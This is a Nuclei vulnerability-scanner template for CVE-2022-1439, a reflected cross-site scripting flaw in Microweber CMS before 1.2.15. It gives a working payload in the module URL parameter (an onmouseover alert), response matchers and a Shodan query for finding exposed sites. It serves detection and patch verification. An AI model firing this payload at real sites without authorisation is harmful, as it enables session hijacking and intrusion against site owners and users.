nuclei-templates/http/cves/2022/CVE-2022-1439.yaml

50 lines
2.2 KiB
YAML

id: CVE-2022-1439
info:
name: Microweber <1.2.15 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
reference:
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0
- https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8
- https://nvd.nist.gov/vuln/detail/CVE-2022-1439
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1439
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40139
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microweber
product: microweber
shodan-query: http.favicon.hash:780351152
tags: cve,cve2022,microweber,xss,huntr
http:
- method: GET
path:
- '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<div class='x module module-'onmouseover=alert(document.domain) '"
- "parent-module-id"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220573a4450bee3af2c247bcbf4df8845dbb17b6ddd89029d0afafa99712032affa022100d59282cd5470f72242c40de7efd1f892867ff9ffc18615afbca3b5554509b7d8:922c64590222798bb761d5b6d8e72950